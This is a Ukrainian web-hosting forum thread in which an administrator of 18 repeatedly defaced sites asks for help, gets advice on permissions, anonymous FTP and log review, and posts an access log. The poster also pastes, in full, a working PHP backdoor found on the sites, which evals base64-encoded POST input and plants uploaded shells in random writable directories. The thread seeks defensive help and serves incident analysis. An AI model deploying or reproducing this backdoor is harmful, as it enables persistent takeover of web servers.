Перейти до змісту

Шукаю поради програміста або самого програміста


aroma

Рекомендовані повідомлення

Короче ситуація така: є хост, на ньому живе 18 сайтів. В один прекрасний день нас хакнули, албанці. Потім знов, і знов. Тупо переписують index під свій код.

Поміняли пароль, почистили від лєвих файлів.... все рівно хакнули.

Не знаю, що робити.

Можливо, хтось стикався з таким. Дайте пораду, як вивести заразу.

А можливо, хтось з програмістів, може залатати дири в сайтах. Сайти на джумлі, опенкарі і хтмл+ксс.

Буду помніть.

Посилання на коментар
Поділитись на інші сайти

Пробуйте ставити права на запис файлів не 777. А також перевірте можливість фтп конекта по anonymous.

А ще було б добре просканувати на ШЕЛи.

Посилання на коментар
Поділитись на інші сайти

755 це нормально?

А ще раз про "можливість фтп конекта по anonymous", де його і як провірити?

Посилання на коментар
Поділитись на інші сайти

скиньте лог доступа за той день коли його ломанули на файлообмiнник

треба взнати що вони роблять щоб його взламати

Посилання на коментар
Поділитись на інші сайти

просіть допомоги на forum.antichat.ru, тільки треба скинути їм іп адреса для перевірки, вони самі подивляться і скажуть де дірки

Посилання на коментар
Поділитись на інші сайти

Ось код з тих файлів, що вони позаливали на сайти. НЕ знаю, чи можна по цьому вичіслити їхні дії.


<!--FILE IS NULL OR EMPTY-->
<?php
$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
$isevalfunctionavailable = false;
$evalcheck = "\$isevalfunctionavailable = true;";
@eval($evalcheck);
if ($isevalfunctionavailable === true) {
$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

$fv = $fnsdht($_POST["gjwqweodsa"]);
@eval($fv);
//@eval($_POST["gjwqweodsa"]);
}else{
$mpath = realpath("")."/";
//$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
@include_once($mpath."dsadasdsa1fag1.php");
@unlink($mpath."dsadasdsa1fag1.php");
}else{
echo "ERROR! CANT DO NOTHING!";
}
}
}
//if (is_uploaded_file($_FILES['file']['tmp_name']))
if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0)
{
$fname = trim($_POST['fname']);
$save_type = trim($_POST['save_type']);
$dirname = trim($_POST['dirname']);
$namecrt = trim($_POST['namecrt']);

$auth_pass = trim($_POST['auth_pass']);
$change_pass = trim($_POST['change_pass']);

$file_type = trim($_POST['file_type']);
$ftdata = trim($_POST['ftdata']);
$is_sh = trim($_POST['is_sh']);

if($namecrt == "random"){
$fname = make_name($fname);
}
$uploadfile = "";

if($save_type == "same_dir"){
$uploadfile = realpath("")."/". $fname;
}else if($save_type == "sub_dir"){
$uploadfile = realpath("")."/$dirname/". $fname;
if(!@mkdir(realpath("")."/$dirname/", 0755)){
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "root"){
$root = $_SERVER['DOCUMENT_ROOT']."/";
if(@is_writable($root)){
$uploadfile = $root.$fname;
}else{
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "root_in_dir"){
$root = $_SERVER['DOCUMENT_ROOT']."/";
$uploadfile = $root."$dirname/". $fname;
if(!@mkdir($root."$dirname/", 0755)){
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "random_dir"){
$uploadfile = choose_dir();
if(@is_writable($uploadfile)){
$uploadfile = $uploadfile.$fname;
}else{
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "random_dir_random_dirname"){
$dirs = array("dwr","temp","htdata","docs","memory","limits_data","module_config","temp_memory");
$dr = $dirs[array_rand($dirs)];

$chodir = choose_dir();
$uploadfile = $chodir.$dr."/".$fname;

if(!@mkdir($chodir."$dr/", 0755)){
$uploadfile = realpath("")."/". $fname;
}
}else{
$uploadfile = realpath("")."/". $fname;
}
if($file_type == "file"){
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
{
if($is_sh == "1" or $is_sh == 1){
if($change_pass == "1" or $change_pass == 1){

}else{
$auth_pass = "";
}
$d = @file_get_contents($uploadfile);
$d = str_replace("{||AUTH_PASS||}",$auth_pass,$d);
@file_put_contents($uploadfile,$d);
}
$url = "http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile);
echo "UPLOAD:".$url."-END";
}
else
{
echo "ERROR upload";
}
}else{
if($is_sh == "1" or $is_sh == 1){
if($change_pass == "1" or $change_pass == 1){

}else{
$auth_pass = "";
}
$ftdata = base64_decode($ftdata);
$ftdata = str_replace("{||AUTH_PASS||}",$auth_pass,$ftdata);
}
if(@file_put_contents($uploadfile,$ftdata)){
@chmod($uploadfile,0644);
echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
}else{
$fp = fopen($uploadfile, "w");
if($fp === false){
echo "ERROR upload";
}else{
@fputs ($fp, $ftdata);
@fclose ($fp);
@chmod($uploadfile,0644);
echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
}
}
}

}
function make_name($curname){
$l = array("_","__","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","1","2","3","4","5","6","7","8","9","Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M");
$leng = rand(3, 9);
$ret = "";
for($i = 0; $i < $leng; $i++){
$ret .= $l[array_rand($l)];
}
$curname = explode(".",$curname);
return $ret.".".$curname[1];
}
function choose_dir(){
$lim = 0;
$res_dirs = array_unique(my_scan($_SERVER['DOCUMENT_ROOT']."/",$lim));
$t = array();
for($j = 0; $j < count($res_dirs); $j++){
$ct = explode("/",$res_dirs[$j]);
$t[] = count($ct);
}
arsort($t);
$cpath = "";
$wrt_dirs = array();
foreach($t as $key=>$val){
if(@is_writable($res_dirs[$key])){
if(@file_put_contents($res_dirs[$key]."t.php","hello")){
@unlink($res_dirs[$key]."t.php");
//$cpath = $res_dirs[$key];
//break;
$wrt_dirs[] = $res_dirs[$key];
}
}
}
if(!empty($wrt_dirs) and count($wrt_dirs)>1){
$cpath = $wrt_dirs[array_rand($wrt_dirs)];
}
if(empty($cpath) or $cpath == "" or strlen($cpath) == 0){
$cpath = $_SERVER['DOCUMENT_ROOT']."/";
}
return $cpath;
}
function my_scan($startDir,&$lim){
$cur_dir = @scandir($startDir);
$res = array();
for($ii = count($cur_dir)-1; $ii >=0; $ii--){
$one_dir = $cur_dir[$ii];
@set_time_limit(0);
if($lim > 100)break;
$d = $startDir.$one_dir;
if(!@is_link($d) and @is_dir($d."/") && $one_dir !== "." && $one_dir !== ".." && $one_dir !== "cgi-bin" && $one_dir !== "webstats" && $one_dir !== "uploads" && $one_dir !== "upload" && $one_dir !== "js" && $one_dir !== "img" && $one_dir !== "images" && $one_dir !== "templates" && $one_dir !== "webstat" && strpos($one_dir,"backup")===false){
if(@is_readable($d."/")){
$res[] = $d."/";
$res = array_merge($res,my_scan($d."/",$lim));
}
}
$lim++;
}
return $res;
}
?>

Посилання на коментар
Поділитись на інші сайти

755 це нормально? А ще раз про "можливість фтп конекта по anonymous", де його і як провірити?

Де не збоїть (більшість пхп файлів) наприклад достатньо і 644 (а це значно надійніше).

ФТП по анонімусу: заходиш по фтп до себе на сервер, але замість логіна і пароля вказуєш anonymous i як паролю будь-який емейл. Якщо не пускає значить все ок.

А взагалі тут люди кажуть толкові речі: знайти логи заходів за день коли взламали, і там багато цікавого можна вичитати (якщо немає - спробувати запрсити їх у хостера).

Бачу по коду, що воно пробує програмно ставити 755, а тоді міняти файли.

Треба шукати корінь проблеми - як вони вперше залили хоть 1 такий файл туди.

Посилання на коментар
Поділитись на інші сайти

Там 18 сайтів і це треба 18 логів? Чи можна по одному логу зрозуміти все інше?

Ось лог одного з сайтів.

95.108.158.239 - - [09/Jan/2014:03:47:40 +0200] "GET /index.php?image=d731a49aae281b69bcd70f59fbcc2153 HTTP/1.0" 200 261 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"

95.108.158.239 - - [09/Jan/2014:03:47:41 +0200] 200 "GET /index.php?image=d731a49aae281b69bcd70f59fbcc2153 HTTP/1.1" 63 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "-"

66.249.78.116 - - [09/Jan/2014:06:09:41 +0200] 200 "GET / HTTP/1.1" 2313 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "-"

66.249.78.116 - - [09/Jan/2014:06:09:38 +0200] "GET / HTTP/1.0" 200 2537 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"

66.249.78.116 - - [09/Jan/2014:06:17:47 +0200] 200 "GET /style.css HTTP/1.1" 1336 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

66.249.78.116 - - [09/Jan/2014:09:29:00 +0200] "GET / HTTP/1.0" 200 2567 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.78.116 - - [09/Jan/2014:09:29:01 +0200] 200 "GET / HTTP/1.1" 2343 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

66.249.78.116 - - [09/Jan/2014:09:34:07 +0200] 200 "GET /helpline.css HTTP/1.1" 867 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

95.108.240.251 - - [09/Jan/2014:10:14:23 +0200] "GET /robots.txt HTTP/1.0" 404 661 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

95.108.240.251 - - [09/Jan/2014:10:14:23 +0200] 404 "GET /robots.txt HTTP/1.1" 492 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] "GET / HTTP/1.0" 200 2566 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] 200 "GET / HTTP/1.1" 2342 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] 200 "GET /style.css HTTP/1.1" 1336 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] 200 "GET /helpline.css HTTP/1.1" 867 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] 200 "GET /images/home.jpg HTTP/1.1" 1988 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] "GET /js/interface.js HTTP/1.0" 404 428 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] "GET /js/jquery.js HTTP/1.0" 404 426 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] 404 "GET /js/jquery.js HTTP/1.1" 200 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] 404 "GET /js/interface.js HTTP/1.1" 202 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] 200 "GET /images/about.png HTTP/1.1" 8768 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] 200 "GET /images/kontaktu.png HTTP/1.1" 9810 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] "GET /index.php?image=028b9acf80ffffa5db3c05d8e4c4490c HTTP/1.0" 200 303 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] 200 "GET /index.php?image=028b9acf80ffffa5db3c05d8e4c4490c HTTP/1.1" 81 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] "GET /index.php?image=50d05018072155224277f057e1931b04 HTTP/1.0" 200 302 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] 200 "GET /index.php?image=50d05018072155224277f057e1931b04 HTTP/1.1" 80 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] 200 "GET /images/plashka.jpg HTTP/1.1" 3980 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:05 +0200] 200 "GET /images/logo.jpg HTTP/1.1" 41614 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] "GET /index.php?image=4d1d0cfb47594ee5f36c39f657441f93 HTTP/1.0" 200 304 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:05 +0200] 200 "GET /index.php?image=7f5f6cd32fc7fcd2945bc9c6cbe1a87e HTTP/1.1" 82 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:05 +0200] 200 "GET /index.php?image=4d1d0cfb47594ee5f36c39f657441f93 HTTP/1.1" 82 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:04 +0200] "GET /index.php?image=7f5f6cd32fc7fcd2945bc9c6cbe1a87e HTTP/1.0" 200 304 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:06 +0200] "GET /favicon.ico HTTP/1.0" 404 427 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:06 +0200] 404 "GET /favicon.ico HTTP/1.1" 201 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:10 +0200] "GET /about.php HTTP/1.0" 200 1880 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:10 +0200] 200 "GET /about.php HTTP/1.1" 1656 "http://www.helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:10 +0200] "GET /js/jquery.js HTTP/1.0" 404 426 "http://www.helpline....n.ua/about.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:10 +0200] 404 "GET /js/jquery.js HTTP/1.1" 200 "http://www.helpline....n.ua/about.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:10 +0200] 404 "GET /js/interface.js HTTP/1.1" 202 "http://www.helpline....n.ua/about.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:10 +0200] "GET /js/interface.js HTTP/1.0" 404 428 "http://www.helpline....n.ua/about.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:10 +0200] 200 "GET /images/about_hover.png HTTP/1.1" 8778 "http://www.helpline....n.ua/about.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:10 +0200] 200 "GET /images/title.jpg HTTP/1.1" 6976 "http://www.helpline....n.ua/about.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:13 +0200] "GET /kontaktu.php HTTP/1.0" 200 1370 "http://www.helpline....n.ua/about.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:13 +0200] 200 "GET /kontaktu.php HTTP/1.1" 1146 "http://www.helpline....n.ua/about.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:13 +0200] "GET /js/jquery.js HTTP/1.0" 404 426 "http://www.helpline....a/kontaktu.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:13 +0200] 404 "GET /js/jquery.js HTTP/1.1" 200 "http://www.helpline....a/kontaktu.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:13 +0200] "GET /js/interface.js HTTP/1.0" 404 428 "http://www.helpline....a/kontaktu.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:13 +0200] 404 "GET /js/interface.js HTTP/1.1" 202 "http://www.helpline....a/kontaktu.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:13 +0200] 200 "GET /images/kontaktu_hover.png HTTP/1.1" 9822 "http://www.helpline....a/kontaktu.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:13 +0200] 200 "GET /images/mulo.gif HTTP/1.1" 737 "http://www.helpline....a/kontaktu.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] "GET /index.php HTTP/1.0" 200 2560 "http://www.helpline....a/kontaktu.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] 200 "GET /index.php HTTP/1.1" 2336 "http://www.helpline....a/kontaktu.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] "GET /js/interface.js HTTP/1.0" 404 428 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] 404 "GET /js/interface.js HTTP/1.1" 202 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] "GET /js/jquery.js HTTP/1.0" 404 426 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] 404 "GET /js/jquery.js HTTP/1.1" 200 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] "GET /index.php?image=86ba0c1555a8638a083f6f90c5c23b7d HTTP/1.0" 200 304 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] 200 "GET /index.php?image=86ba0c1555a8638a083f6f90c5c23b7d HTTP/1.1" 82 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] "GET /index.php?image=044fe20abf6f705741df224ddea0f9bf HTTP/1.0" 200 303 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] 200 "GET /index.php?image=044fe20abf6f705741df224ddea0f9bf HTTP/1.1" 81 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] "GET /index.php?image=028b9acf80ffffa5db3c05d8e4c4490c HTTP/1.0" 200 303 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] 200 "GET /index.php?image=028b9acf80ffffa5db3c05d8e4c4490c HTTP/1.1" 81 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] "GET /index.php?image=6198a7465b05d318a007aaa5a0314f1d HTTP/1.0" 200 300 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:10:54:15 +0200] 200 "GET /index.php?image=6198a7465b05d318a007aaa5a0314f1d HTTP/1.1" 78 "http://www.helpline....n.ua/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

95.108.240.251 - - [09/Jan/2014:12:12:53 +0200] "GET / HTTP/1.0" 200 2541 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

95.108.240.251 - - [09/Jan/2014:12:12:53 +0200] 200 "GET / HTTP/1.1" 2317 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"

95.108.240.251 - - [09/Jan/2014:12:12:55 +0200] "GET /index.php HTTP/1.0" 200 2537 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

95.108.240.251 - - [09/Jan/2014:12:12:55 +0200] 200 "GET /index.php HTTP/1.1" 2313 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"

95.108.240.251 - - [09/Jan/2014:12:13:06 +0200] "GET /robots.txt HTTP/1.0" 404 665 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

95.108.240.251 - - [09/Jan/2014:12:13:06 +0200] 404 "GET /robots.txt HTTP/1.1" 496 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"

95.108.240.251 - - [09/Jan/2014:12:13:15 +0200] "GET / HTTP/1.0" 200 2539 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

95.108.240.251 - - [09/Jan/2014:12:13:16 +0200] 200 "GET / HTTP/1.1" 2315 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"

95.108.240.251 - - [09/Jan/2014:12:15:12 +0200] "GET / HTTP/1.0" 200 2539 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

95.108.240.251 - - [09/Jan/2014:12:15:12 +0200] 200 "GET / HTTP/1.1" 2315 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"

95.108.240.251 - - [09/Jan/2014:12:17:23 +0200] "GET / HTTP/1.0" 200 2565 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

95.108.240.251 - - [09/Jan/2014:12:17:23 +0200] 200 "GET / HTTP/1.1" 2341 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"

95.108.240.251 - - [09/Jan/2014:12:18:38 +0200] "GET / HTTP/1.0" 200 2565 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

95.108.240.251 - - [09/Jan/2014:12:18:38 +0200] 200 "GET / HTTP/1.1" 2341 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"

71.20.159.71 - - [09/Jan/2014:13:08:51 +0200] 302 "GET /administrator/index.php HTTP/1.1" 160 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" "-"

71.20.159.71 - - [09/Jan/2014:13:08:51 +0200] "GET /administrator/index.php HTTP/1.0" 404 674 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

71.20.159.71 - - [09/Jan/2014:13:08:51 +0200] 404 "GET /administrator/index.php HTTP/1.1" 505 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" "-"

